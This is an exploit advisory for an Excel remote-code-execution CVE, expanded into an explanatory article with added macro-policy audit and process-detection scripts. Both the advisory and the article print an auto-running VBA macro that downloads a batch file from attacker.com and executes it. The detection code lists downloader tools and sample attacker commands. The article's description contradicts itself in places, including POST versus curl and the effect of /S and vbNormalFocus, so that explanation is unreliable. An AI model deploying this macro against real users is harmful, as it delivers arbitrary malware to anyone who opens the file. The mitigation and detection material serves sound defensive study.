Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 06.27.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://portswigger.net/daily-swig/rce
## CVE-2023-33137
## Description:
This exploit relies on a third-party exploit server, which waits for the victim to call it and then serves content that is executed using the pipe-posting method! This is absolutely a 0-day exploit! It is absolutely dangerous for the victims who are infected by it!
When the victim hits the button in the Excel file, it makes a POST request to the exploit server, and the server responds this way: it creates another hidden malicious file and executes it directly on the victim's machine, then everything disappears, so nasty.
STATUS: HIGH Vulnerability. WARNING: THIS IS VERY DANGEROUS for ordinary users!
[+]Exploit:
```vbs
Sub AutoOpen()
    ' Runs automatically when the document is opened. VBA needs " _" to continue
    ' a statement across lines; a space is required after /c so that cmd.exe
    ' receives "curl" as a separate token.
    Call Shell("cmd.exe /S /c " & _
        "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat" & _
        " > maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)
## Time spent:
01:27:00

## CVE-2023-33137: A Critical Remote Code Execution Vulnerability in Microsoft 365 MSO (32-bit)
On June 27, 2023, cybersecurity researcher nu11secur1ty unveiled a highly dangerous zero-day exploit targeting Microsoft 365's Microsoft Office (MSO) suite—specifically version 2305 Build 16.0.16501.20074 for 32-bit systems. This vulnerability, assigned the identifier CVE-2023-33137, enables attackers to achieve remote code execution (RCE) through a malicious Excel file, exploiting a flaw in how embedded macros interact with external network resources.
## Exploit Mechanism: The Hidden Pipeline Attack
The core of this exploit lies in a maliciously crafted Excel file that leverages the AutoOpen() event trigger—a built-in VBA macro that executes automatically when a document is opened. When a user opens the infected file, the macro initiates an HTTP POST request to a remote server controlled by the attacker.
This server acts as a third-party exploit delivery mechanism. Upon receiving the request, it responds by sending a payload: a malicious batch script (maloumnici.bat) which is downloaded and executed directly on the victim’s machine.
```vbs
Sub AutoOpen()
    ' Same macro as in the advisory: fetch a batch file and run it in one cmd.exe invocation
    Call Shell("cmd.exe /S /c " & _
        "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat" & _
        " > maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub
```
Explanation: This VBA code snippet triggers execution upon document opening. It uses Shell() to invoke the Windows command interpreter (cmd.exe) with the following commands:
- curl -s: downloads the malicious script from the remote server silently (the -s flag suppresses curl's progress meter and error messages).
- >: redirects the output to a local file named maloumnici.bat.
- && .\maloumnici.bat: executes the downloaded script immediately after the download.
The /S flag suppresses verbose output, making the attack stealthy. The use of vbNormalFocus ensures the command runs in a non-interactive window, avoiding user alerts.
## Why This Is a 0-Day Threat
As of June 2023, Microsoft had not issued a patch for this vulnerability. The exploit was discovered and disclosed before the vendor acknowledged it, classifying it as a 0-day—a critical security flaw that is actively exploited in the wild.
Attackers can use this method to deliver payloads such as:
- Backdoor malware (e.g., Remcos, Qakbot)
- Keyloggers and credential stealers
- Remote access trojans (RATs)
- Self-propagating ransomware
Once executed, the malicious script can persist, disable security software, and exfiltrate sensitive data—often leaving no trace after execution.
## Attack Surface and Targeting
This exploit primarily affects users running:
- Microsoft 365 Excel (32-bit)
- Version 2305 Build 16.0.16501.20074
- Windows 10 and Windows 11 (especially older or unpatched systems)
It is particularly dangerous in environments where:
- Users open unsolicited Excel files from email attachments
- Office macros are enabled by default
- Network restrictions are bypassed via outbound HTTP requests
Attackers can host the malicious script on cloud platforms like GitHub or Cloudflare, making it difficult to block with traditional firewall rules.
## Proof of Concept and Reproduction
Researchers have published proof-of-concept files at the GitHub repository and blog post linked under Reproduce and Proof and Exploit in the advisory above.
These repositories contain the malicious Excel file and the corresponding server-side payload. The exploit has been tested successfully on unpatched systems, demonstrating full RCE capability.
## Security Implications and Mitigation Strategies
Immediate Risk: This vulnerability is rated High Severity due to its ease of exploitation, stealthy nature, and potential for widespread compromise.
Recommended Mitigations:
| Strategy | Description |
|---|---|
| Disable Macro Execution | Set Excel to disable macros by default via Group Policy or user settings. Use Trust Center settings to block all macros unless explicitly trusted. |
| Network Monitoring | Deploy firewalls or EDR tools to detect outbound curl or cmd.exe commands with suspicious URLs. |
| Endpoint Protection | Use advanced anti-malware solutions (e.g., Microsoft Defender, CrowdStrike) that can detect and block script execution from temporary files. |
| Regular Patching | Ensure all Microsoft 365 installations are updated to the latest build. Monitor Microsoft Security Updates for CVE-2023-33137 patch release. |
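The Disable Macro Execution row can be checked mechanically rather than by clicking through the Trust Center on each machine. The following is an added example, not code from the advisory or from nu11secur1ty: it parses a constructed .reg export of the per-application policy keys (HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\<App>\Security, the standard Microsoft 365 policy location, where VBAWarnings=4 is "Disable all macros without notification" and blockcontentexecutionfrominternet=1 is "Block macros from running in Office files from the Internet"), reports every weak or missing value, and emits the corrected export. The sample values are constructed; the parser handles only the DWORD and string entries it needs.

```python
"""Added example: audit exported Office macro policy and emit a hardened one.

Not the advisory's code. It parses a .reg export (constructed below, not taken
from any real machine), checks the per-application policy values that the
"Disable Macro Execution" mitigation refers to, and prints the corrected export.
Key path and value names are the standard Microsoft 365 / Office 2016+ policy
locations; the sample values are constructed.
"""
import re
from typing import Dict, List

APPS = ("Excel", "Word", "PowerPoint")
POLICY_KEY = r"HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\{app}\Security"
# Meaning of the VBAWarnings policy value (Trust Center "Macro Settings")
VBA_WARNINGS = {1: "enable all macros", 2: "disable with notification (user can enable)",
                3: "disable except digitally signed", 4: "disable all without notification"}

# Constructed export of a weak configuration: Excel lets the user click "Enable Content",
# Word enables everything, PowerPoint has no policy at all.
WEAK_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security]
"VBAWarnings"=dword:00000002
"blockcontentexecutionfrominternet"=dword:00000000

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Word\Security]
"VBAWarnings"=dword:00000001
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{1,8})$')
STRING_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Minimal .reg parser: returns {key path: {value name (lowercased): value}}."""
    values: Dict[str, Dict[str, object]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            values.setdefault(current, {})
            continue
        if current is None:
            continue
        m = DWORD_RE.match(line)
        if m:
            values[current][m.group(1).lower()] = int(m.group(2), 16)
            continue
        m = STRING_RE.match(line)
        if m:
            values[current][m.group(1).lower()] = m.group(2)
    return values


def audit(values: Dict[str, Dict[str, object]]) -> List[str]:
    """Return one finding per weak or missing macro policy value."""
    findings: List[str] = []
    for app in APPS:
        sec = values.get(POLICY_KEY.format(app=app), {})
        vba = sec.get("vbawarnings")
        if vba is None:
            findings.append(f"{app}: no VBAWarnings policy; the Trust Center setting is left to the user")
        elif vba not in (3, 4):
            findings.append(f"{app}: VBAWarnings={vba} ({VBA_WARNINGS.get(vba, 'unknown')}); "
                            f"set 4, or 3 if signed macros are needed")
        if sec.get("blockcontentexecutionfrominternet") != 1:
            findings.append(f"{app}: blockcontentexecutionfrominternet is not 1; "
                            f"macros in files marked as from the Internet are not blocked")
    return findings


def hardened_export() -> str:
    """Corrected policy for all three applications as a .reg export."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for app in APPS:
        lines += [f"[{POLICY_KEY.format(app=app)}]",
                  '"VBAWarnings"=dword:00000004',
                  '"blockcontentexecutionfrominternet"=dword:00000001', ""]
    return "\n".join(lines)


if __name__ == "__main__":
    for finding in audit(parse_reg(WEAK_EXPORT)):
        print("WEAK:", finding)
    print(hardened_export())
```

Feed it the output of reg export from a workstation, or apply the same checks to an Intune or Group Policy report; the machine-wide variant of the policy lives under HKEY_LOCAL_MACHINE\Software\Policies with the same value names. VBAWarnings=3 is accepted as a floor for environments that depend on signed macros, but 4 is the setting that neutralises the macro in this advisory outright.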
## Expert Insight: The Evolution of Office-Based RCE
Historically, Office-based exploits have relied on document-level macros or OLE injection. This new variant represents a hybrid attack model: combining client-side scripting with server-side command delivery. It reflects the growing trend of cloud-based exploit delivery—where attackers use web infrastructure to dynamically serve payloads.
Security professionals must now consider:
- How macros can be used to trigger network interactions without direct file execution.
- The importance of behavioral analysis over static signatures.
- The role of trusted domains in enabling malicious payloads.
Future defenses should focus on real-time monitoring of command-line execution patterns, especially those involving curl, PowerShell, or cmd.exe with external URLs.
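The command-line monitoring recommended here, together with the Network Monitoring and Endpoint Protection rows of the mitigation table and the command-line breakdown in the Exploit Mechanism section, can be expressed as a concrete rule. The following is an added example, not code from the advisory or from nu11secur1ty: it runs a classifier over constructed process-creation records in the shape of Sysmon Event ID 1 / Windows 4688 fields (parent image, image, command line) and flags the chain the macro relies on: an Office application spawning a shell whose command line fetches an external URL and immediately executes what it downloaded. Two details matter when writing such a rule: cmd.exe's /S switch only changes how quotes in the /C string are parsed and does not suppress output, and vbNormalFocus shows the console window with focus (vbHide is the constant that would hide it), so the detection keys on the parent/child pair and the command-line contents rather than on those flags. The application lists, severity thresholds, log records and URLs are all constructed for the example.

```python
"""Added example: flag Office -> shell -> download -> execute process chains.

Not the advisory's code. Event fields mirror Sysmon Event ID 1 / Windows 4688
(parent image, image, command line); every sample event below is constructed.
"""
import re
from dataclasses import dataclass
from typing import List

# Office applications whose child processes deserve scrutiny (assumed list; extend as needed)
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Interpreters a macro typically reaches via Shell()
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Built-in or common download utilities seen on the command line
DOWNLOADER_RE = re.compile(
    r"\b(?:curl|wget|certutil|bitsadmin|invoke-webrequest|iwr|downloadstring|downloadfile)\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
# A script or binary launched after a separator in the same command: "&& .\x.bat", "; .\x.ps1"
SCRIPT_EXEC_RE = re.compile(
    r"(?:&&|\|\||;|\|)\s*(?:\.\\|call\s+|start\s+)?[\w.\\:-]+\.(?:bat|cmd|ps1|vbs|js|hta|exe)\b", re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    severity: str          # "high", "medium", "low" or "none"
    reasons: List[str]
    event: ProcEvent


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> Finding:
    """Score one process-creation event against the macro-downloader pattern."""
    reasons: List[str] = []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    office_child = parent in OFFICE_PARENTS and child in SHELLS
    if office_child:
        reasons.append(f"{parent} spawned {child}")
    if DOWNLOADER_RE.search(ev.command_line):
        reasons.append("download utility on command line")
    if URL_RE.search(ev.command_line):
        reasons.append("external URL on command line")
    if SCRIPT_EXEC_RE.search(ev.command_line):
        reasons.append("script executed in the same command")
    if office_child and len(reasons) >= 3:
        severity = "high"      # Office parent plus download/URL plus execution: the advisory's chain
    elif office_child:
        severity = "medium"    # Office spawning a shell is rare enough to triage on its own
    elif len(reasons) >= 2:
        severity = "low"       # download plus URL from a non-Office parent: needs context
    else:
        severity = "none"
    return Finding(severity, reasons, ev)


def scan(events: List[ProcEvent]) -> List[Finding]:
    """Return findings for every event that scored above 'none'."""
    return [f for f in (classify(e) for e in events) if f.severity != "none"]


# Constructed sample events (not real telemetry). The first mirrors the advisory's macro.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd.exe /S /c curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat "
              r"> maloumnici.bat && .\maloumnici.bat"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c curl -s https://example.com/api/status"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -nop -w hidden -c "iwr https://attacker.com/x.ps1 -OutFile x.ps1; .\x.ps1"'),
    ProcEvent(r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\SysWOW64\cmd.exe", r"cmd.exe /c echo hi"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity.upper()}] {f.event.command_line}\n    " + "; ".join(f.reasons))
```

The severity thresholds are illustrative; in production map the three fields onto your SIEM's process-creation schema, tune OFFICE_PARENTS and SHELLS to the software you actually deploy, and pair the "medium" tier (Office spawning any interpreter) with an allowlist of known-good add-ins so the rule stays actionable.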
## Conclusion: A Wake-Up Call for Users and Organizations
CVE-2023-33137 is not just a technical flaw—it’s a real-world threat that can compromise systems with minimal user interaction. The ease of deployment, combined with the absence of patching at the time of disclosure, makes it a prime candidate for widespread abuse.
Organizations must act now: disable macros, monitor outbound traffic, and update software. For individual users, the rule remains simple: never open Excel files from untrusted sources. This exploit underscores the evolving sophistication of cyberattacks—and the need for constant vigilance.